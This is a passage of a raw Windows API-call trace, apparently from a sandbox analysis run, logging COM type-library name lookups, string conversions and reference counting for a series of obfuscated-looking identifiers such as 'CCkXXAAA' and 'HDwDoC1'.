lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_qA4UA4CU") returned 16 [0068.536] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_qA4UA4CU", lHashVal=0x105182, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x71005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x71005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0) returned 0x0 [0068.536] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba2c76 | out: _Dst=0x145020) returned 0x0 [0068.536] ITypeComp:RemoteBind (in: This=0x665ba60, szName="CCkXXAAA", lHashVal=0x10b783, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2cca, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="CCkXXAAA") returned 9 [0068.536] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="CCkXXAAA", lHashVal=0x10b783, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2cca, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="CCkXXAAA") returned 9 [0068.536] ITypeComp:RemoteBind (in: This=0x665bd30, szName="CCkXXAAA", lHashVal=0x10b783, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.536] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CCkXXAAA") returned 0x10b783 [0068.536] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="CCkXXAAA" | out: _Dst="CCkXXAAA") returned 0x0 [0068.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="CCkXXAAA") returned 9 [0068.536] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.536] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="CCkXXAAA", lHashVal=0x10b783, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.536] IUnknown:Release (This=0x665ba50) returned 0xb [0068.536] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.536] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="CCkXXAAA", lHashVal=0x10b783, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.536] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.536] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.536] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="CCkXXAAA", lHashVal=0x10b783, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.537] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.537] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.537] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="CCkXXAAA", lHashVal=0x10b783, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.537] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2cca, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="CCkXXAAA") returned 9 [0068.537] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="CCkXXAAA", lHashVal=0x10b783, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.537] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.537] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3ba2cca | out: _Dst=0x67c2d40) returned 0x0 [0068.537] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_CCkXXAAA") returned 0x108f0c [0068.537] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_CCkXXAAA" | out: _Dst="_B_var_CCkXXAAA") returned 0x0 [0068.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_CCkXXAAA") returned 16 [0068.537] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.537] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_CCkXXAAA", lHashVal=0x108f0c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.537] IUnknown:Release (This=0x665ba50) returned 0xb [0068.537] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.537] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_CCkXXAAA", lHashVal=0x108f0c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.537] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.537] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.537] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_CCkXXAAA", lHashVal=0x108f0c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.537] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.537] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.537] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_CCkXXAAA", lHashVal=0x108f0c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.537] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.537] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.537] IUnknown:Release (This=0x665ba50) returned 0xb [0068.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc21aa, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_CCkXXAAA") returned 16 [0068.537] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_CCkXXAAA", lHashVal=0x108f0c, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x43005f00720061, ppTypeComp=0x58005800000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x43005f00720061, ppTypeComp=0x58005800000000, pDummy=0x0) returned 0x0 [0068.537] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba2cca | out: _Dst=0x145020) returned 0x0 [0068.538] ITypeComp:RemoteBind (in: This=0x665ba60, szName="HDwDoC1", lHashVal=0x101277, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2ca2, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="HDwDoC1") returned 8 [0068.538] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="HDwDoC1", lHashVal=0x101277, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2ca2, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="HDwDoC1") returned 8 [0068.538] ITypeComp:RemoteBind (in: This=0x665bd30, szName="HDwDoC1", lHashVal=0x101277, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.538] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HDwDoC1") returned 0x101277 [0068.538] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="HDwDoC1" | out: _Dst="HDwDoC1") returned 0x0 [0068.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="HDwDoC1") returned 8 [0068.538] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.538] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="HDwDoC1", lHashVal=0x101277, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.538] IUnknown:Release (This=0x665ba50) returned 0xb [0068.538] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.538] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="HDwDoC1", lHashVal=0x101277, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.538] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.538] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.538] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="HDwDoC1", lHashVal=0x101277, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.538] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.538] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.538] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="HDwDoC1", lHashVal=0x101277, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.538] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2ca2, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="HDwDoC1") returned 8 [0068.538] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="HDwDoC1", lHashVal=0x101277, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.538] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.538] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3ba2ca2 | out: _Dst=0x67c2d40) returned 0x0 [0068.538] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_HDwDoC1") returned 0x1015fb [0068.538] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_HDwDoC1" | out: _Dst="_B_var_HDwDoC1") returned 0x0 [0068.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_HDwDoC1") returned 15 [0068.539] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.539] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_HDwDoC1", lHashVal=0x1015fb, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.539] IUnknown:Release (This=0x665ba50) returned 0xb [0068.539] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.539] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_HDwDoC1", lHashVal=0x1015fb, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.539] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.539] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.539] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_HDwDoC1", lHashVal=0x1015fb, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.539] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.539] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.539] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_HDwDoC1", lHashVal=0x1015fb, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.539] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.539] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.539] IUnknown:Release (This=0x665ba50) returned 0xb [0068.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc21da, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_HDwDoC1") returned 15 [0068.539] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_HDwDoC1", lHashVal=0x1015fb, wFlags=0x5, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x48005f00720061, ppTypeComp=0x6f004400000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x48005f00720061, ppTypeComp=0x6f004400000000, pDummy=0x0) returned 0x0 [0068.539] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba2ca2 | out: _Dst=0x145020) returned 0x0 [0068.539] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2d1e, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="dUAAoow") returned 8 [0068.539] ITypeComp:RemoteBind (in: This=0x665ba60, szName="dUAAoow", lHashVal=0x105d77, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2d1e, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="dUAAoow") returned 8 [0068.539] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="dUAAoow", lHashVal=0x105d77, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2d1e, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="dUAAoow") returned 8 [0068.539] ITypeComp:RemoteBind (in: This=0x665bd30, szName="dUAAoow", lHashVal=0x105d77, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.540] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dUAAoow") returned 0x105d77 [0068.540] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="dUAAoow" | out: _Dst="dUAAoow") returned 0x0 [0068.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="dUAAoow") returned 8 [0068.540] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.540] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="dUAAoow", lHashVal=0x105d77, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.540] IUnknown:Release (This=0x665ba50) returned 0xb [0068.540] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.540] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="dUAAoow", lHashVal=0x105d77, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.540] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.540] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.540] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="dUAAoow", lHashVal=0x105d77, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.540] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.540] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.540] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="dUAAoow", lHashVal=0x105d77, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.540] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2d1e, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="dUAAoow") returned 8 [0068.540] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="dUAAoow", lHashVal=0x105d77, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.540] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.540] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3ba2d1e | out: _Dst=0x67c2d40) returned 0x0 [0068.540] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_dUAAoow") returned 0x10517a [0068.540] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Const", cchCount1=-1, lpString2="_B_var_dUAAoow", cchCount2=-1) returned 3 [0068.540] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_dUAAoow" | out: _Dst="_B_var_dUAAoow") returned 0x0 [0068.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_dUAAoow") returned 15 [0068.540] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.540] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_dUAAoow", lHashVal=0x10517a, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.540] IUnknown:Release (This=0x665ba50) returned 0xb [0068.540] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.540] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_dUAAoow", lHashVal=0x10517a, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.541] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.541] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.541] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_dUAAoow", lHashVal=0x10517a, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.541] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.541] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.541] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_dUAAoow", lHashVal=0x10517a, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.541] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.541] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.541] IUnknown:Release (This=0x665ba50) returned 0xb [0068.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc220a, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_dUAAoow") returned 15 [0068.541] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_dUAAoow", lHashVal=0x10517a, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x64005f00720061, ppTypeComp=0x6f004100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x64005f00720061, ppTypeComp=0x6f004100000000, pDummy=0x0) returned 0x0 [0068.541] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba2d1e | out: _Dst=0x145020) returned 0x0 [0068.541] ITypeComp:RemoteBind (in: This=0x665ba60, szName="BDGokAwo", lHashVal=0x107bae, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2d46, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="BDGokAwo") returned 9 [0068.541] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="BDGokAwo", lHashVal=0x107bae, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2d46, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="BDGokAwo") returned 9 [0068.541] ITypeComp:RemoteBind (in: This=0x665bd30, szName="BDGokAwo", lHashVal=0x107bae, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.541] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BDGokAwo") returned 0x107bae [0068.541] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="BDGokAwo" | out: _Dst="BDGokAwo") returned 0x0 [0068.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="BDGokAwo") returned 9 [0068.541] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.542] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="BDGokAwo", lHashVal=0x107bae, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.542] IUnknown:Release (This=0x665ba50) returned 0xb [0068.542] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.542] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="BDGokAwo", lHashVal=0x107bae, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.542] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.542] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.542] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="BDGokAwo", lHashVal=0x107bae, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.542] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.542] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.542] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="BDGokAwo", lHashVal=0x107bae, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.542] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2d46, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="BDGokAwo") returned 9 [0068.542] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="BDGokAwo", lHashVal=0x107bae, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.542] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.542] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3ba2d46 | out: _Dst=0x67c2d40) returned 0x0 [0068.542] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_BDGokAwo") returned 0x105337 [0068.542] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_BDGokAwo" | out: 